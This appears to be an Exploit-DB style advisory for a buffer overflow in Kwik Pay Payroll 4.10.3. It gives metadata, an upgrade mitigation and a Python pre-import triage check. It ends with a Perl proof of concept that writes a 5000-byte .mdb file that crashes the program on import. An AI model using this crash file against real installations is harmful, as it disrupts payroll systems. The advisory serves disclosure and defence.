Vendor: Kwik Pay Payroll
By: [anonymous]
CVSS: 7.5 (HIGH)
Vulnerability Type: Buffer Overflow
CWE: 120
Product Name: Kwik Pay Payroll
Affected Version From: 4.10.3
Affected Version To: 4.10.3
Patch Exists: YES
Related CWE: N/A
CPE: a:kwik_pay:kwik_pay_payroll
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Kwik Pay Payroll .mdb Crash PoC

A buffer overflow vulnerability exists in Kwik Pay Payroll version 4.10.3. Importing a specially crafted .mdb file crashes the program. The crafted file contains 5000 bytes of data.

Mitigation:

Upgrade to the latest version of Kwik Pay Payroll.
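For systems that cannot be upgraded immediately, a pre-import triage check can screen candidate files. This is an added example, not part of the original advisory or PoC: the PoC file on this page is 5000 repeated 0x41 bytes and carries no Access database header, so it can be flagged before import. The function names, finding labels and the Jet/ACE signature check at offset 4 are assumptions of this example.

```python
import os
import tempfile

# Assumption of this example: a Jet/ACE database starts with bytes 00 01 00 00
# followed by one of these signatures at offset 4.
JET_PREFIX = b"\x00\x01\x00\x00"
JET_MAGIC = (b"Standard Jet DB", b"Standard ACE DB")

# Constructed samples (not real databases).
POC_LIKE = b"\x41" * 5000                      # same shape as the PoC file on this page
VALID_LIKE = JET_PREFIX + b"Standard Jet DB\x00" + b"\x00" * 4076


def triage_mdb(data):
    """Return a list of findings for candidate .mdb content; empty means none."""
    findings = []
    if len(data) < len(JET_PREFIX) + len(JET_MAGIC[0]):
        findings.append("too-short")
    elif data[:4] != JET_PREFIX or not data[4:].startswith(JET_MAGIC):
        findings.append("missing-jet-header")
    # A file made of one repeated byte value is filler, not a database.
    if data and data.count(data[:1]) == len(data):
        findings.append("single-byte-fill")
    return findings


def triage_file(path, sample_size=65536):
    """Triage the first sample_size bytes of a file on disk."""
    with open(path, "rb") as fh:
        return triage_mdb(fh.read(sample_size))


def demo():
    """Write both constructed samples to temp files and triage them."""
    results = {}
    for name, blob in (("poc_like.mdb", POC_LIKE), ("valid_like.mdb", VALID_LIKE)):
        with tempfile.TemporaryDirectory() as tmp:
            path = os.path.join(tmp, name)
            with open(path, "wb") as fh:
                fh.write(blob)
            results[name] = triage_file(path)
    return results


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "no findings")
```

A file that passes this check is not thereby safe to import; the upgrade above remains the fix.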

Exploit-DB raw data:

# Exploit Title: Kwik Pay Payroll .mdb Crash PoC
# Date: April 1, 2010
# Version: 4.10.3
# Tested on: Windows XP SP3
# Cost: 100.00 AU
# Author: [anonymous]
# Site: [http://www.setfreesecurity.com]
# 
# Usage: Run Script, Open the program
# File -> Import Payroll Data 
# Select From Data Source Drop-Down: Kwik-Pay Payroll Data 
# Browse and Import your .mdb File
#
# **********************************************
# ** It took 33 years to save my life         **
# ** thats 11 more years to make things right **
# **********************************************
# My hat goes off to the Exploit-DB Crew!
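#!/usr/bin/perl
use strict;
use warnings;

print "Broke as a Joke. . .\n";

# 5000 bytes of 0x41 ('A'): the file content that crashes the import
my $data = "\x41" x 5000;
my $money = "payroll.mdb";

# Three-argument open with an error check; raw mode writes the bytes unchanged
open(my $fh, '>:raw', $money) or die "Cannot open $money: $!";
print {$fh} $data;
close($fh) or die "Cannot close $money: $!";

print "\nShow me the money!\n";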